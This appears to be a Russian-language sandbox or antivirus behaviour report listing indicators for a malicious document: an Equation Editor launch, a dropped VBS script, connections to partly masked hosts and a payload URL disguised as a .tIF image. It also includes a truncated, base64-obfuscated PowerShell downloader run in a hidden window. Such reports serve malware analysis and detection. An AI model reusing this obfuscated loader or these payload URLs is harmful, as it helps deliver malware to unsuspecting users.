Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\getmebackwithnewpciturefoo.Vbs"
- %APPDATA%\getmebackwithnewpciturefoo.vbs
- '18#.#9.11.107':80
- 'ra#.####ubusercontent.com':443
- http://18#.#9.11.107/350/getmebackwithnewpciturefood.tIF
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'LiggJEVudjpDT01zUGVjWzQsMjQsMjVdLWpPaW4nJykgKCgnN3N4dXJsJysnID0nKycgbE53aHR0cCcrJ3M6Ly9yJysnYScrJ3cuZ2l0JysnaHVidXNlcmNvbicrJ3RlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2MnKyd0T24vT... (со скрытым окном)